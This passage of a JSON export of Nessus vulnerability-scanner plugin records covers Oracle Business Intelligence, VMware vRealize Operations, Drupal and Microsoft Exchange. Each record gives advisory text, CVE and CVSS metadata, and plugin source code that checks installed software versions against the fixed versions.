port:port, webapp:TRUE);\n\nconstraints = [\n { 'min_version' : '7.0', 'fixed_version' : '7.74' },\n # Advisory states 8.8 *or earlier*. Interpreting this as 8.x \n { 'min_version' : '8.0', 'fixed_version' : '8.8.11' },\n { 'min_version' : '8.9', 'fixed_version' : '8.9.9' },\n { 'min_version' : '9.0', 'fixed_version' : '9.0.8' }\n];\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T17:46:14", "description": "The version of Oracle Business Intelligence Enterprise Edition (OAS) 5.5.0.0.0 installed on the remote host are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-08T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Enterprise Edition (OAS) (Oct 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14864"], "modified": "2023-05-08T00:00:00", "cpe": ["cpe:/a:oracle:business_intelligence"], "id": "ORACLE_OBIEE_CPU_OCT_2020_OAS.NASL", "href": "https://www.tenable.com/plugins/nessus/175282", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(175282);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/08\");\n\n script_cve_id(\"CVE-2020-14864\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Oracle Business Intelligence Enterprise Edition (OAS) (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Enterprise Edition (OAS) 5.5.0.0.0 installed on the remote\nhost are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the \nOracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily\nexploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business\nIntelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical\ndata or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpuoct2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14864\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_analytics_server_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Analytics Server\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Analytics Server');\n\n# based on Oracle CPU data\nvar constraints = [\n {'min_version': '5.5.0', 'fixed_version': '5.5.0.0.201012', 'fixed_display': '5.5.0.0.201012 patch: 32003790'}\n];\n\nvcf::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_HOLE);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:44:34", "description": "The version of Oracle Business Intelligence Enterprise Edition 12.2.1.3 and 12.2.1.4 installed on the remote host are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-02-28T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Enterprise Edition (Oct 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14864"], "modified": "2023-03-01T00:00:00", "cpe": ["cpe:/a:oracle:business_intelligence"], "id": "ORACLE_OBIEE_CPU_OCT_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/171961", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(171961);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/01\");\n\n script_cve_id(\"CVE-2020-14864\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Oracle Business Intelligence Enterprise Edition (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Enterprise Edition 12.2.1.3 and 12.2.1.4 installed on the remote\nhost are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the \nOracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily\nexploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business\nIntelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical\ndata or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpuoct2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14864\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_business_intelligence_enterprise_edition_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Enterprise Edition\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Business Intelligence Enterprise Edition');\n\n# based on Oracle CPU data\nvar constraints = [\n {'min_version': '12.2.1.3', 'fixed_version': '12.2.1.3.201020', 'fixed_display': '12.2.1.3.201020 patch: 31690029'},\n {'min_version': '12.2.1.4', 'fixed_version': '12.2.1.4.201020', 'fixed_display': '12.2.1.4.201020 patch: 31690037'}\n];\n\nvcf::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_HOLE);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:45", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to 7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or 8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0019\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21975\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:45", "description": "Two vulnerabilities were discovered in Drupal, a fully-featured content management framework.\n\nCVE-2020-13666\n\nThe Drupal AJAX API did not disable JSONP by default, which could lead to cross-site scripting.\n\nFor setups that relied on Drupal's AJAX API for JSONP requests, either JSONP will need to be reenabled, or the jQuery AJAX API will have to be used instead.\n\nSee the upstream advisory for more details:\nhttps://www.drupal.org/sa-core-2020-007\n\nCVE-2020-13671\n\nDrupal failed to sanitize filenames on uploaded files, which could lead to those files being served as the wrong MIME type, or being executed depending on the server configuration.\n\nIt is also recommended to check previously uploaded files for malicious extensions. For more details see the upstream advisory: https://www.drupal.org/sa-core-2020-012\n\nFor Debian 9 stretch, these problems have been fixed in version 7.52-2+deb9u12.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-11-20T00:00:00", "type": "nessus", "title": "Debian DLA-2458-1 : drupal7 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2458.NASL", "href": "https://www.tenable.com/plugins/nessus/143138", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2458-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143138);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2020-13666\", \"CVE-2020-13671\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Debian DLA-2458-1 : drupal7 security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Two vulnerabilities were discovered in Drupal, a fully-featured\ncontent management framework.\n\nCVE-2020-13666\n\nThe Drupal AJAX API did not disable JSONP by default, which could lead\nto cross-site scripting.\n\nFor setups that relied on Drupal's AJAX API for JSONP\nrequests, either JSONP will need to be reenabled, or the\njQuery AJAX API will have to be used instead.\n\nSee the upstream advisory for more details:\nhttps://www.drupal.org/sa-core-2020-007\n\nCVE-2020-13671\n\nDrupal failed to sanitize filenames on uploaded files, which could\nlead to those files being served as the wrong MIME type, or being\nexecuted depending on the server configuration.\n\nIt is also recommended to check previously uploaded files\nfor malicious extensions. For more details see the upstream\nadvisory: https://www.drupal.org/sa-core-2020-012\n\nFor Debian 9 stretch, these problems have been fixed in version\n7.52-2+deb9u12.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/11/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-012\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13671\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:27:19", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482, CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-33766)", "cvss3": {}, "published": "2021-04-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (April 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_APR_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/148476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148476);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-28480\",\n \"CVE-2021-28481\",\n \"CVE-2021-28482\",\n \"CVE-2021-28483\",\n \"CVE-2021-33766\",\n \"CVE-2021-34473\",\n \"CVE-2021-34523\"\n );\n script_xref(name:\"MSKB\", value:\"5001779\");\n script_xref(name:\"MSFT\", value:\"MS21-5001779\");\n script_xref(name:\"IAVA\", value:\"2021-A-0160-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0040\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0022\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0021\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482,\n CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to\n gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to\n disclose potentially sensitive information. (CVE-2021-33766)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3bdeeea7\");\n # https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b66291c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5001779\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34473\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-34523\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.18',\n 'kb': '5001779'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 18,\n 'cu' : 20,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.14',\n 'kb': '5001779'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 18,\n 'cu' : 20,\n 'min_version': '15.01.2242.0',\n 'fixed_version': '15.01.2242.10',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.15',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 9,\n 'min_version': '15.02.858.0',\n 'fixed_version': '15.02.858.12',\n 'kb': '5001779'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS21-05',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:38", "description": "- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013 (CVE-2020-28948 / CVE-2020-28949)\n\n- https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012 (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011 (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010 (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009 (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008 (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007 (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-15T00:00:00", "type": "nessus", "title": "Fedora 33 : drupal8 (2020-6f1079934c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2022-08-30T00:00:00", 